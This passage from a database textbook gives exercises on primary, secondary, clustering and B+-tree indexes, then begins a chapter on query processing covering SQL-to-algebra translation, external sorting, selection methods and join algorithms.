(30 bytes), Ssn (9 bytes), Department_code (9 bytes), Address (40 bytes),
Phone (10 bytes), Birth_date (8 bytes), Sex (1 byte), Job_code (4 bytes), and
Salary (4 bytes, real number). An additional byte is used as a deletion marker.

a. Calculate the record size R in bytes.

b. Calculate the blocking factor bfr and the number of file blocks b, assum-
ing an unspanned organization.

c. Suppose that the file is ordered by the key field Ssn and we want to con-
struct a primary index on Ssn. Calculate (i) the index blocking factor bfri
(which is also the index fan-out fo); (ii) the number of first-level index
entries and the number of first-level index blocks; (iii) the number of lev-
els needed if we make it into a multilevel index; (iv) the total number of
blocks required by the multilevel index; and (v) the number of block
accesses needed to search for and retrieve a record from the file—given its
Ssn value—using the primary index.

d. Suppose that the file is not ordered by the key field Ssn and we want to
construct a secondary index on Ssn. Repeat the previous exercise (part c)
for the secondary index and compare with the primary index.

e. Suppose that the file is not ordered by the nonkey field Department_code
and we want to construct a secondary index on Department_code, using
option 3 of Section 1.3, with an extra level of indirection that stores
record pointers. Assume there are 1,000 distinct values of
Department_code and that the EMPLOYEE records are evenly distributed
among these values. Calculate (i) the index blocking factor bfri (which is
also the index fan-out fo); (ii) the number of blocks needed by the level of
indirection that stores record pointers; (iii) the number of first-level
index entries and the number of first-level index blocks; (iv) the number
of levels needed if we make it into a multilevel index; (v) the total number
of blocks required by the multilevel index and the blocks used in the extra
level of indirection; and (vi) the approximate number of block accesses
needed to search for and retrieve all records in the file that have a specific
Department_code value, using the index.

f. Suppose that the file is ordered by the nonkey field Department_code and
we want to construct a clustering index on Department_code that uses
block anchors (every new value of Department_code starts at the beginning
of a new block). Assume there are 1,000 distinct values of
Department_code and that the EMPLOYEE records are evenly distributed
among these values. Calculate (i) the index blocking factor bfri (which is
also the index fan-out fo); (ii) the number of first-level index entries and
the number of first-level index blocks; (iii) the number of levels needed if
we make it into a multilevel index; (iv) the total number of blocks


required by the multilevel index; and (v) the number of block accesses
needed to search for and retrieve all records in the file that have a specific
Department_code value, using the clustering index (assume that multiple
blocks in a cluster are contiguous).

g. Suppose that the file is not ordered by the key field Ssn and we want to
construct a B+-tree access structure (index) on Ssn. Calculate (i) the
orders p and pleaf of the B+-tree; (ii) the number of leaf-level blocks
needed if blocks are approximately 69 percent full (rounded up for con-
venience); (iii) the number of levels needed if internal nodes are also 69
percent full (rounded up for convenience); (iv) the total number of blocks
required by the B+-tree; and (v) the number of block accesses needed to
search for and retrieve a record from the file—given its Ssn value—using
the B+-tree.

h. Repeat part g, but for a B-tree rather than for a B+-tree. Compare your
results for the B-tree and for the B+-tree.

19. A PARTS file with Part# as the key field includes records with the following
Part# values: 23, 65, 37, 60, 46, 92, 48, 71, 56, 59, 18, 21, 10, 74, 78, 15, 16, 20,
24, 28, 39, 43, 47, 50, 69, 75, 8, 49, 33, 38. Suppose that the search field values
are inserted in the given order in a B+-tree of order p = 4 and pleaf = 3; show
how the tree will expand and what the final tree will look like.

20. Repeat Exercise 19, but use a B-tree of order p = 4 instead of a B+-tree.

21. Suppose that the following search field values are deleted, in the given order,
from the B+-tree of Exercise 19; show how the tree will shrink and show the
final tree. The deleted values are 65, 75, 43, 18, 20, 92, 59, 37.

22. Repeat Exercise 21, but for the B-tree of Exercise 20.

23. Algorithm 1 outlines the procedure for searching a nondense multilevel pri-
mary index to retrieve a file record. Adapt the algorithm for each of the fol-
lowing cases:

a. A multilevel secondary index on a nonkey nonordering field of a file.
Assume that option 3 of Section 1.3 is used, where an extra level of indi-
rection stores pointers to the individual records with the corresponding
index field value.

b. A multilevel secondary index on a nonordering key field of a file.

c. A multilevel clustering index on a nonkey ordering field of a file.

24. Suppose that several secondary indexes exist on nonkey fields of a file,
implemented using option 3 of Section 1.3; for example, we could have sec-
ondary indexes on the fields Department_code, Job_code, and Salary of the
EMPLOYEE file of Exercise 18. Describe an efficient way to search for and
retrieve records satisfying a complex selection condition on these fields, such
as (Department_code = 5 AND Job_code = 12 AND Salary = 50,000), using the
record pointers in the indirection level.


25. Adapt Algorithms 2 and 3, which outline search and insertion procedures for
a B+-tree, to a B-tree.

26. It is possible to modify the B+-tree insertion algorithm to delay the case
where a new level is produced by checking for a possible redistribution of val-
ues among the leaf nodes. Figure 17 illustrates how this could be
done for our example in Figure 12; rather than splitting the leftmost leaf
node when 12 is inserted, we do a left redistribution by moving 7 to the leaf
node to its left (if there is space in this node). Figure 17 shows how the tree
would look when redistribution is considered. It is also possible to consider
right redistribution. Try to modify the B+-tree insertion algorithm to take
redistribution into account.

27. Outline an algorithm for deletion from a B+-tree.

28. Repeat Exercise 27 for a B-tree.

Selected Bibliography
Bayer and McCreight (1972) introduced B-trees and associated algorithms. Comer
(1979) provides an excellent survey of B-trees and their history, and variations of B-
trees. Knuth (1998) provides detailed analysis of many search techniques, including
B-trees and some of their variations. Nievergelt (1974) discusses the use of binary
search trees for file organization. Textbooks on file structures including Claybrook
(1992), Smith and Barnes (1987), and Salzberg (1988), the algorithms and data
structures textbook by Wirth (1985), as well as the database textbook by
Ramakrishnan and Gehrke (2003) discuss indexing in detail and may be consulted
for search, insertion, and deletion algorithms for B-trees and B+-trees. Larson
(1981) analyzes index-sequential files, and Held and Stonebraker (1978) compare
static multilevel indexes with B-tree dynamic indexes. Lehman and Yao (1981) and
Srinivasan and Carey (1991) did further analysis of concurrent access to B-trees.
The books by Wiederhold (1987), Smith and Barnes (1987), and Salzberg (1988),
among others, discuss many of the search techniques described in this chapter. Grid
files are introduced in Nievergelt et al. (1984). Partial-match retrieval, which uses
partitioned hashing, is discussed in Burkhard (1976, 1979).

New techniques and applications of indexes and B+-trees are discussed in Lanka
and Mays (1991), Zobel et al. (1992), and Faloutsos and Jagadish (1992). Mohan
and Narang (1992) discuss index creation. The performance of various B-tree and
B+-tree algorithms is assessed in Baeza-Yates and Larson (1989) and Johnson and
Shasha (1993). Buffer management for indexes is discussed in Chan et al. (1992).
Column-based storage of databases was proposed by Stonebraker et al. (2005) in the
C-Store database system; MonetDB/X100 by Boncz et al. (2008) is another imple-
mentation of the idea. Abadi et al. (2008) discuss the advantages of column stores
over row-stored databases for read-only database applications.


Figure 17
B+-tree insertion with left redistribution. (The figure shows the example B+-tree of
Figure 12 after each step: inserting 12 causes an overflow that is handled by a left
redistribution; inserting 9 causes an overflow that creates a new level; and inserting
6 causes an overflow that is handled by a split.)


Figure A.1
Some blocks of an ordered (sequential) file of EMPLOYEE records with Name as the
ordering key field. (The figure shows blocks 1 through n of the file; each record has
the fields Name, Ssn, Birth_date, Job, Salary, and Sex, and the records are ordered
alphabetically by Name, from Aaron, Ed in block 1 through Zimmer, Byron in
block n.)


Table A.1 Average Access Times for a File of b Blocks under Basic File Organizations

Type of Organization    Access/Search Method               Average Blocks to Access a Specific Record
Heap (unordered)        Sequential scan (linear search)    b/2
Ordered                 Sequential scan                    b/2
Ordered                 Binary search                      log2 b

Figure A.2
Structure of the extendible hashing scheme. (The figure shows a directory of global
depth d = 3, with entries 000 through 111 pointing to the data file buckets. The
buckets for records whose hash values start with 000, 001, 110, and 111 have local
depth d′ = 3, while the buckets for records whose hash values start with 01 and 10
have local depth d′ = 2.)


Figure A.3
Structure of the dynamic hashing scheme. (The figure shows a binary tree-structured
directory of internal directory nodes and leaf directory nodes; following the 0 and 1
branches from the root leads to the data file buckets for records whose hash values
start with 000, 001, 01, 10, 110, and 111.)


Algorithms for Query
Processing and Optimization

In this chapter we discuss the techniques used internally by a DBMS to process, optimize, and execute
high-level queries. A query expressed in a high-level query language such as SQL
must first be scanned, parsed, and validated.1 The scanner identifies the query
tokens—such as SQL keywords, attribute names, and relation names—that appear
in the text of the query, whereas the parser checks the query syntax to determine
whether it is formulated according to the syntax rules (rules of grammar) of the
query language. The query must also be validated by checking that all attribute and
relation names are valid and semantically meaningful names in the schema of the
particular database being queried. An internal representation of the query is then
created, usually as a tree data structure called a query tree. It is also possible to rep-
resent the query using a graph data structure called a query graph. The DBMS must
then devise an execution strategy or query plan for retrieving the results of the
query from the database files. A query typically has many possible execution strate-
gies, and the process of choosing a suitable one for processing a query is known as
query optimization.

Figure 1 shows the different steps of processing a high-level query. The query opti-
mizer module has the task of producing a good execution plan, and the code gener-
ator generates the code to execute that plan. The runtime database processor has
the task of running (executing) the query code, whether in compiled or interpreted
mode, to produce the query result. If a runtime error results, an error message is
generated by the runtime database processor.

1We will not discuss the parsing and syntax-checking phase of query processing here; this material is
discussed in compiler textbooks.

From Chapter 19 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and
Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison-
Wesley. All rights reserved.


The term optimization is actually a misnomer because in some cases the chosen exe-
cution plan is not the optimal (or absolute best) strategy—it is just a reasonably effi-
cient strategy for executing the query. Finding the optimal strategy is usually too
time-consuming—except for the simplest of queries. In addition, trying to find the
optimal query execution strategy may require detailed information on how the files
are implemented and even on the contents of the files—information that may not
be fully available in the DBMS catalog. Hence, planning of a good execution strategy
may be a more accurate description than query optimization.

For lower-level navigational database languages in legacy systems—such as the
network DML or the hierarchical DL/1—the programmer must choose the query
execution strategy while writing a database program. If a DBMS provides only a
navigational language, there is limited need or opportunity for extensive query opti-
mization by the DBMS; instead, the programmer is given the capability to choose
the query execution strategy. On the other hand, a high-level query language—
such as SQL for relational DBMSs (RDBMSs) or OQL for object DBMSs
(ODBMSs)—is more declarative in nature because it specifies what the intended
results of the query are, rather than identifying the details of how the result should
be obtained. Query optimization is thus necessary for queries that are specified in
a high-level query language.

We will concentrate on describing query optimization in the context of an RDBMS
because many of the techniques we describe have also been adapted for other types

Figure 1
Typical steps when processing a high-level query. (The figure shows the following
pipeline: a query in a high-level language is scanned, parsed, and validated; the
intermediate form of the query is passed to the query optimizer, which produces an
execution plan; the query code generator produces the code to execute the query;
and the runtime database processor runs that code to produce the result of the
query. The code can be executed directly in interpreted mode, or stored and
executed later whenever needed in compiled mode.)


2There are some query optimization problems and techniques that are pertinent only to ODBMSs.
However, we do not discuss them here because we give only an introduction to query optimization.

of database management systems, such as ODBMSs.2 A relational DBMS must sys-
tematically evaluate alternative query execution strategies and choose a reasonably
efficient or near-optimal strategy. Each DBMS typically has a number of general
database access algorithms that implement relational algebra operations such as
SELECT or JOIN or combinations of these operations. Only execution strategies that
can be implemented by the DBMS access algorithms and that apply to the particu-
lar query, as well as to the particular physical database design, can be considered by
the query optimization module.

This chapter starts with a general discussion of how SQL queries are typically trans-
lated into relational algebra queries and then optimized in Section 1. Then we dis-
cuss algorithms for implementing relational algebra operations in Sections 2
through 6. Following this, we give an overview of query optimization strategies.
There are two main techniques that are employed during query optimization. The
first technique is based on heuristic rules for ordering the operations in a query
execution strategy. A heuristic is a rule that works well in most cases but is not guar-
anteed to work well in every case. The rules typically reorder the operations in a
query tree. The second technique involves systematically estimating the cost of dif-
ferent execution strategies and choosing the execution plan with the lowest cost esti-
mate. These techniques are usually combined in a query optimizer. We discuss
heuristic optimization in Section 7 and cost estimation in Section 8. Then we pro-
vide a brief overview of the factors considered during query optimization in the
Oracle commercial RDBMS in Section 9. Section 10 introduces the topic of seman-
tic query optimization, in which known constraints are used as an aid to devising
efficient query execution strategies.

The topics covered in this chapter require that the reader be familiar with SQL, rela-
tional algebra, and file structures and indexing. Also, it is important to note that the
topic of query processing and optimization is vast, and we can only give an intro-
duction to the basic principles and techniques in this chapter.

1 Translating SQL Queries into Relational
Algebra

In practice, SQL is the query language that is used in most commercial RDBMSs. An
SQL query is first translated into an equivalent extended relational algebra expres-
sion—represented as a query tree data structure—that is then optimized. Typically,
SQL queries are decomposed into query blocks, which form the basic units that can
be translated into the algebraic operators and optimized. A query block contains a
single SELECT-FROM-WHERE expression, as well as GROUP BY and HAVING clauses
if these are part of the block. Hence, nested queries within a query are identified as


separate query blocks. Because SQL includes aggregate operators—such as MAX,
MIN, SUM, and COUNT—these operators must also be included in the extended
algebra.

Consider the following SQL query on the EMPLOYEE relation in Figure A.1 (in
Appendix: Figures at the end of this chapter):

SELECT Lname, Fname
FROM EMPLOYEE
WHERE Salary > ( SELECT MAX (Salary)
                 FROM EMPLOYEE
                 WHERE Dno=5 );

This query retrieves the names of employees (from any department in the com-
pany) who earn a salary that is greater than the highest salary in department 5. The
query includes a nested subquery and hence would be decomposed into two blocks.
The inner block is:

( SELECT MAX (Salary)
FROM EMPLOYEE
WHERE Dno=5 )

This retrieves the highest salary in department 5. The outer query block is:

SELECT Lname, Fname
FROM EMPLOYEE
WHERE Salary > c

where c represents the result returned from the inner block. The inner block could
be translated into the following extended relational algebra expression:

ℑMAX Salary(σDno=5(EMPLOYEE))

and the outer block into the expression:

πLname,Fname(σSalary>c(EMPLOYEE))

The query optimizer would then choose an execution plan for each query block.
Notice that in the above example, the inner block needs to be evaluated only once to
produce the maximum salary of employees in department 5, which is then used—as
the constant c—by the outer block. We call this a nested query (without correlation
with the outer query). It is much harder to optimize the more complex correlated
nested queries, where a tuple variable from the outer query block appears in the
WHERE-clause of the inner query block.
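To make the two-step evaluation concrete, here is a minimal Python sketch, assuming
the EMPLOYEE relation is held in memory as a list of dictionaries (the sample rows
are invented purely for illustration):

# Hypothetical in-memory EMPLOYEE tuples; only the attributes used by the query are shown.
EMPLOYEE = [
    {"Lname": "Smith", "Fname": "John", "Salary": 30000, "Dno": 5},
    {"Lname": "Wong", "Fname": "Franklin", "Salary": 40000, "Dno": 5},
    {"Lname": "Borg", "Fname": "James", "Salary": 55000, "Dno": 1},
]

# Inner block: evaluated only once, producing the constant c.
c = max(t["Salary"] for t in EMPLOYEE if t["Dno"] == 5)

# Outer block: uses c as an ordinary constant in its selection condition.
result = [(t["Lname"], t["Fname"]) for t in EMPLOYEE if t["Salary"] > c]
print(result)   # [('Borg', 'James')]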

2 Algorithms for External Sorting
Sorting is one of the primary algorithms used in query processing. For example,
whenever an SQL query specifies an ORDER BY-clause, the query result must be
sorted. Sorting is also a key component in sort-merge algorithms used for JOIN and
other operations (such as UNION and INTERSECTION), and in duplicate elimination
algorithms for the PROJECT operation (when an SQL query specifies the DISTINCT


option in the SELECT clause). We will discuss one of these algorithms in this sec-
tion. Note that sorting of a particular file may be avoided if an appropriate index—
such as a primary or clustering index—exists on the desired file attribute to allow
ordered access to the records of the file.

External sorting refers to sorting algorithms that are suitable for large files of
records stored on disk that do not fit entirely in main memory, such as most data-
base files.3 The typical external sorting algorithm uses a sort-merge strategy, which
starts by sorting small subfiles—called runs—of the main file and then merges the
sorted runs, creating larger sorted subfiles that are merged in turn. The sort-merge
algorithm, like other database algorithms, requires buffer space in main memory,
where the actual sorting and merging of the runs is performed. The basic algorithm,
outlined in Figure 2, consists of two phases: the sorting phase and the merging
phase. The buffer space in main memory is part of the DBMS cache—an area in the
computer’s main memory that is controlled by the DBMS. The buffer space is
divided into individual buffers, where each buffer is the same size in bytes as the size
of one disk block. Thus, one buffer can hold the contents of exactly one disk block.

In the sorting phase, runs (portions or pieces) of the file that can fit in the available
buffer space are read into main memory, sorted using an internal sorting algorithm,
and written back to disk as temporary sorted subfiles (or runs). The size of each run
and the number of initial runs (nR) are dictated by the number of file blocks (b)
and the available buffer space (nB). For example, if the number of available main
memory buffers nB = 5 disk blocks and the size of the file b = 1024 disk blocks, then
nR= ⎡(b/nB)⎤ or 205 initial runs each of size 5 blocks (except the last run which will
have only 4 blocks). Hence, after the sorting phase, 205 sorted runs (or 205 sorted
subfiles of the original file) are stored as temporary subfiles on disk.

In the merging phase, the sorted runs are merged during one or more merge
passes. Each merge pass can have one or more merge steps. The degree of merging
(dM) is the number of sorted subfiles that can be merged in each merge step. During
each merge step, one buffer block is needed to hold one disk block from each of the
sorted subfiles being merged, and one additional buffer is needed for containing
one disk block of the merge result, which will produce a larger sorted file that is the
result of merging several smaller sorted subfiles. Hence, dM is the smaller of (nB − 1)
and nR, and the number of merge passes is ⎡(logdM(nR))⎤. In our example where nB =
5, dM = 4 (four-way merging), so the 205 initial sorted runs would be merged 4 at a
time in each step into 52 larger sorted subfiles at the end of the first merge pass.
These 52 sorted files are then merged 4 at a time into 13 sorted files, which are then
merged into 4 sorted files, and then finally into 1 fully sorted file, which means that
four passes are needed.

3Internal sorting algorithms are suitable for sorting data structures, such as tables and lists, that can fit
entirely in main memory. These algorithms are described in detail in data structures and algorithms
books, and include techniques such as quick sort, heap sort, bubble sort, and many others. We do not dis-
cuss these here.


set i ← 1;
j ← b; {size of the file in blocks}
k ← nB; {size of buffer in blocks}
m ← ⎡( j/k)⎤;

{Sorting Phase}
while (i ≤ m)
do {

read next k blocks of the file into the buffer or if there are less than k blocks
remaining, then read in the remaining blocks;

sort the records in the buffer and write as a temporary subfile;
i ← i + 1;

}

{Merging Phase: merge subfiles until only 1 remains}
set i ← 1;

p ← ⎡logk–1m⎤ {p is the number of passes for the merging phase}
j ← m;

while (i ≤ p)
do {

n ← 1;
q ← ⎡( j/(k–1))⎤; {number of subfiles to write in this pass}
while (n ≤ q)
do {

read next k–1 subfiles or remaining subfiles (from previous pass)
one block at a time;

merge and write as new subfile one block at a time;
n ← n + 1;

}
j ← q;
i ← i + 1;

}

Figure 2
Outline of the sort-merge algorithm for external sorting.

The performance of the sort-merge algorithm can be measured in the number of
disk block reads and writes (between the disk and main memory) before the sorting
of the whole file is completed. The following formula approximates this cost:

(2 * b) + (2 * b * (logdM nR))

The first term (2 * b) represents the number of block accesses for the sorting phase,
since each file block is accessed twice: once for reading into a main memory buffer
and once for writing the sorted records back to disk into one of the sorted subfiles.
The second term represents the number of block accesses for the merging phase.
During each merge pass, a number of disk blocks approximately equal to the origi-
nal file blocks b is read and written. Since the number of merge passes is (logdM nR),
we get the total merge cost of (2 * b * (logdM nR)).


The minimum number of main memory buffers needed is nB = 3, which gives a dM
of 2 and an nR of ⎡(b/3)⎤. The minimum dM of 2 gives the worst-case performance
of the algorithm, which is:

(2 * b) + (2 * (b * (log2 nR))).
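These cost formulas are easy to check numerically. The following sketch (an
illustration, not part of the original algorithm) plugs in the chapter's example of
b = 1024 file blocks and nB = 5 buffers:

import math

def external_sort_cost(b, nB):
    """Estimate block reads/writes for sort-merge external sorting.

    b  -- number of file blocks
    nB -- number of available main-memory buffer blocks (nB >= 3)
    """
    nR = math.ceil(b / nB)        # number of initial sorted runs
    dM = min(nB - 1, nR)          # degree of merging
    passes, runs = 0, nR
    while runs > 1:               # each pass merges dM runs at a time
        runs = math.ceil(runs / dM)
        passes += 1
    sorting = 2 * b               # each block read once and written once
    merging = 2 * b * passes      # each pass reads and writes about b blocks
    return nR, dM, passes, sorting + merging

print(external_sort_cost(1024, 5))   # (205, 4, 4, 10240): 205 runs, 4-way merge, 4 passes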

The following sections discuss the various algorithms for the operations of the rela-
tional algebra.

3 Algorithms for SELECT and JOIN Operations

3.1 Implementing the SELECT Operation
There are many algorithms for executing a SELECT operation, which is basically a
search operation to locate the records in a disk file that satisfy a certain condition.
Some of the search algorithms depend on the file having specific access paths, and
they may apply only to certain types of selection conditions. We discuss some of the
algorithms for implementing SELECT in this section. We will use the following
operations, specified on the relational database in Figure A.1, to illustrate our dis-
cussion:

OP1: σSsn = ‘123456789’ (EMPLOYEE)

OP2: σDnumber > 5 (DEPARTMENT)

OP3: σDno = 5 (EMPLOYEE)

OP4: σDno = 5 AND Salary > 30000 AND Sex = ‘F’ (EMPLOYEE)

OP5: σEssn=‘123456789’ AND Pno =10(WORKS_ON)

Search Methods for Simple Selection. A number of search algorithms are
possible for selecting records from a file. These are also known as file scans, because
they scan the records of a file to search for and retrieve records that satisfy a selec-
tion condition.4 If the search algorithm involves the use of an index, the index
search is called an index scan. The following search methods (S1 through S6) are
examples of some of the search algorithms that can be used to implement a select
operation:

■ S1—Linear search (brute force algorithm). Retrieve every record in the file,
and test whether its attribute values satisfy the selection condition. Since the
records are grouped into disk blocks, each disk block is read into a main
memory buffer, and then a search through the records within the disk block
is conducted in main memory.

4A selection operation is sometimes called a filter, since it filters out the records in the file that do not
satisfy the selection condition.


■ S2—Binary search. If the selection condition involves an equality compari-
son on a key attribute on which the file is ordered, binary search—which is
more efficient than linear search—can be used. An example is OP1 if Ssn is
the ordering attribute for the EMPLOYEE file.5

■ S3a—Using a primary index. If the selection condition involves an equality
comparison on a key attribute with a primary index—for example, Ssn =
‘123456789’ in OP1—use the primary index to retrieve the record. Note that
this condition retrieves a single record (at most).

■ S3b—Using a hash key. If the selection condition involves an equality com-
parison on a key attribute with a hash key—for example, Ssn = ‘123456789’
in OP1—use the hash key to retrieve the record. Note that this condition
retrieves a single record (at most).

■ S4—Using a primary index to retrieve multiple records. If the comparison
condition is >, >=, <, or <= on a key field with a primary index—for example,
Dnumber > 5 in OP2—use the index to find the record satisfying the
corresponding equality condition (Dnumber = 5), then retrieve all subsequent
records in the (ordered) file. For the condition Dnumber < 5, retrieve all the
preceding records.

■ S5—Using a clustering index to retrieve multiple records. If the selection
condition involves an equality comparison on a nonkey attribute with a
clustering index—for example, Dno = 5 in OP3—use the index to retrieve all
the records satisfying the condition.

■ S6—Using a secondary (B+-tree) index on an equality comparison. This
search method can be used to retrieve a single record if the indexing field is a
key (has unique values) or to retrieve multiple records if the indexing field is
not a key. This can also be used for comparisons involving >, >=, <, or <=.

In Section 8, we discuss how to develop formulas that estimate the access cost of
these search methods in terms of the number of block accesses and access time.
Method S1 (linear search) applies to any file, but all the other methods depend on
having the appropriate access path on the attribute used in the selection condition.
Method S2 (binary search) requires the file to be sorted on the search attribute. The
methods that use an index (S3a, S4, S5, and S6) are generally referred to as index
searches, and they require the appropriate index to exist on the search attribute.
Methods S4 and S6 can be used to retrieve records in a certain range—for example,
30000 <= Salary <= 35000. Queries involving such conditions are called range
queries.

5Generally, binary search is not used in database searches because ordered files are not used unless
they also have a corresponding primary index.

Search Methods for Complex Selection. If a condition of a SELECT operation
is a conjunctive condition—that is, if it is made up of several simple conditions
connected with the AND logical connective such as OP4 above—the DBMS can use
the following additional methods to implement the operation:

■ S7—Conjunctive selection using an individual index. If an attribute
involved in any single simple condition in the conjunctive select condition
has an access path that permits the use of one of the methods S2 to S6, use
that condition to retrieve the records and then check whether each retrieved
record satisfies the remaining simple conditions in the conjunctive select
condition.

■ S8—Conjunctive selection using a composite index. If two or more attributes
are involved in equality conditions in the conjunctive select condition
and a composite index (or hash structure) exists on the combined fields—for
example, if an index has been created on the composite key (Essn, Pno) of
the WORKS_ON file for OP5—we can use the index directly.

■ S9—Conjunctive selection by intersection of record pointers.6 If secondary
indexes (or other access paths) are available on more than one of the
fields involved in simple conditions in the conjunctive select condition, and
if the indexes include record pointers (rather than block pointers), then each
index can be used to retrieve the set of record pointers that satisfy the
individual condition. The intersection of these sets of record pointers gives
the record pointers that satisfy the conjunctive select condition, which are
then used to retrieve those records directly. If only some of the conditions
have secondary indexes, each retrieved record is further tested to determine
whether it satisfies the remaining conditions.7 In general, method S9 assumes
that each of the indexes is on a nonkey field of the file, because if one of the
conditions is an equality condition on a key field, only one record will satisfy
the whole condition.

6A record pointer uniquely identifies a record and provides the address of the record on disk; hence, it is
also called the record identifier or record id.
7The technique can have many variations—for example, if the indexes are logical indexes that store
primary key values instead of record pointers.

Whenever a single condition specifies the selection—such as OP1, OP2, or OP3—
the DBMS can only check whether or not an access path exists on the attribute
involved in that condition. If an access path (such as index or hash key or sorted
file) exists, the method corresponding to that access path is used; otherwise, the
brute force, linear search approach of method S1 can be used. Query optimization
for a SELECT operation is needed mostly for conjunctive select conditions whenever
more than one of the attributes involved in the conditions have an access path. The
optimizer should choose the access path that retrieves the fewest records in the
most efficient way by estimating the different costs (see Section 8) and choosing the
method with the least estimated cost.

Selectivity of a Condition. When the optimizer is choosing between multiple
simple conditions in a conjunctive select condition, it typically considers the
selectivity of each condition. The selectivity (sl) is defined as the ratio of the number
of records (tuples) that satisfy the condition to the total number of records (tuples)
in the file (relation), and thus is a number between zero and one. Zero selectivity
means none of the records in the file satisfies the selection condition, and a
selectivity of one means that all the records in the file satisfy the condition. In
general, the selectivity will not be either of these two extremes, but will be a fraction
that estimates the percentage of file records that will be retrieved.

Although exact selectivities of all conditions may not be available, estimates of
selectivities are often kept in the DBMS catalog and are used by the optimizer. For
example, for an equality condition on a key attribute of relation r(R), sl = 1/|r(R)|,
where |r(R)| is the number of tuples in relation r(R). For an equality condition on a
nonkey attribute with i distinct values, sl can be estimated by (|r(R)|/i)/|r(R)| or 1/i,
assuming that the records are evenly or uniformly distributed among the distinct
values.8 Under this assumption, |r(R)|/i records will satisfy an equality condition on
this attribute. In general, the number of records satisfying a selection condition
with selectivity sl is estimated to be |r(R)| * sl. The smaller this estimate is, the
higher the desirability of using that condition first to retrieve records. In certain
cases, the actual distribution of records among the various distinct values of the
attribute is kept by the DBMS in the form of a histogram, in order to get more
accurate estimates of the number of records that satisfy a particular condition.

Disjunctive Selection Conditions. Compared to a conjunctive selection
condition, a disjunctive condition (where simple conditions are connected by the
OR logical connective rather than by AND) is much harder to process and optimize.
For example, consider OP4′:

OP4′: σDno=5 OR Salary > 30000 OR Sex=‘F’ (EMPLOYEE)

With such a condition, little optimization can be done, because the records satisfy-
ing the disjunctive condition are the union of the records satisfying the individual
conditions. Hence, if any one of the conditions does not have an access path, we are
compelled to use the brute force, linear search approach. Only if an access path
exists on every simple condition in the disjunction can we optimize the selection by
retrieving the records satisfying each condition—or their record ids—and then
applying the union operation to eliminate duplicates.

A DBMS will have available many of the methods discussed above, and typically
many additional methods. The query optimizer must choose the appropriate one
for executing each SELECT operation in a query. This optimization uses formulas
that estimate the costs for each available access method, as we will discuss in Section
8. The optimizer chooses the access method with the lowest estimated cost.

8In more sophisticated optimizers, histograms representing the distribution of the records among the dif-
ferent attribute values can be kept in the catalog.
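Before moving on to joins, the following sketch illustrates how an optimizer might
use such catalog-based estimates to order the simple conditions of a conjunctive
selection by the number of records each is expected to retrieve. The statistics are
invented, and Salary > 30000 is treated as if it were an equality condition purely to
keep the example small:

def estimate_selectivity(cond, stats):
    """Rough selectivity (sl) of a simple condition on one attribute.

    stats["distinct"] maps an attribute to its number of distinct values;
    a uniform distribution of records over those values is assumed,
    so sl is estimated as 1/i (and 1/|r(R)| for a key attribute).
    """
    attr, _value = cond
    return 1.0 / stats["distinct"][attr]

# Invented statistics for the EMPLOYEE file used in OP4.
stats = {"num_records": 6000,
         "distinct": {"Dno": 50, "Salary": 500, "Sex": 2}}

conds = [("Dno", 5), ("Salary", 30000), ("Sex", "F")]
# Apply the most selective condition (fewest estimated records) first.
ordered = sorted(conds,
                 key=lambda c: stats["num_records"] * estimate_selectivity(c, stats))
print(ordered)   # [('Salary', 30000), ('Dno', 5), ('Sex', 'F')]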


3.2 Implementing the JOIN Operation
The JOIN operation is one of the most time-consuming operations in query pro-
cessing. Many of the join operations encountered in queries are of the EQUIJOIN
and NATURAL JOIN varieties, so we consider just these two here since we are only
giving an overview of query processing and optimization. For the remainder of this
chapter, the term join refers to an EQUIJOIN (or NATURAL JOIN).

There are many possible ways to implement a two-way join, which is a join on two
files. Joins involving more than two files are called multiway joins. The number of
possible ways to execute multiway joins grows very rapidly. In this section we dis-
cuss techniques for implementing only two-way joins. To illustrate our discussion,
we refer to the relational schema in Figure A.1 once more—specifically, to the
EMPLOYEE, DEPARTMENT, and PROJECT relations. The algorithms we discuss next
are for a join operation of the form:

R ⋈A=B S

where A and B are the join attributes, which should be domain-compatible attrib-
utes of R and S, respectively. The methods we discuss can be extended to more gen-
eral forms of join. We illustrate four of the most common techniques for
performing such a join, using the following sample operations:

OP6: EMPLOYEE ⋈Dno=Dnumber DEPARTMENT
OP7: DEPARTMENT ⋈Mgr_ssn=Ssn EMPLOYEE

Methods for Implementing Joins.

■ J1—Nested-loop join (or nested-block join). This is the default (brute
force) algorithm, as it does not require any special access paths on either file
in the join. For each record t in R (outer loop), retrieve every record s from S
(inner loop) and test whether the two records satisfy the join condition
t[A] = s[B].9

■ J2—Single-loop join (using an access structure to retrieve the matching
records). If an index (or hash key) exists for one of the two join attributes—
say, attribute B of file S—retrieve each record t in R (loop over file R), and
then use the access structure (such as an index or a hash key) to retrieve
directly all matching records s from S that satisfy s[B] = t[A].

■ J3—Sort-merge join. If the records of R and S are physically sorted (ordered)
by value of the join attributes A and B, respectively, we can implement the join
in the most efficient way possible. Both files are scanned concurrently in order
of the join attributes, matching the records that have the same values for A and
B. If the files are not sorted, they may be sorted first by using external sorting
(see Section 2). In this method, pairs of file blocks are copied into memory
buffers in order and the records of each file are scanned only once each for

9For disk files, it is obvious that the loops will be over disk blocks, so this technique has also been called
nested-block join.


matching with the other file—unless both A and B are nonkey attributes, in
which case the method needs to be modified slightly. A sketch of the sort-
merge join algorithm is given in Figure 3(a). We use R(i) to refer to the ith
record in file R. A variation of the sort-merge join can be used when secondary
indexes exist on both join attributes. The indexes provide the ability to access
(scan) the records in order of the join attributes, but the records themselves are
physically scattered all over the file blocks, so this method may be quite ineffi-
cient, as every record access may involve accessing a different disk block.

■ J4—Partition-hash join. The records of files R and S are partitioned into
smaller files. The partitioning of each file is done using the same hashing
function h on the join attribute A of R (for partitioning file R) and B of S (for
partitioning file S). First, a single pass through the file with fewer records (say,
R) hashes its records to the various partitions of R; this is called the
partitioning phase, since the records of R are partitioned into the hash buck-
ets. In the simplest case, we assume that the smaller file can fit entirely in
main memory after it is partitioned, so that the partitioned subfiles of R are
all kept in main memory. The collection of records with the same value of
h(A) are placed in the same partition, which is a hash bucket in a hash table
in main memory. In the second phase, called the probing phase, a single pass
through the other file (S) then hashes each of its records using the same hash
function h(B) to probe the appropriate bucket, and that record is combined
with all matching records from R in that bucket. This simplified description
of partition-hash join assumes that the smaller of the two files fits entirely into
memory buckets after the first phase. We will discuss the general case of
partition-hash join that does not require this assumption below. In practice,
techniques J1 to J4 are implemented by accessing whole disk blocks of a file,
rather than individual records. Depending on the available number of buffers
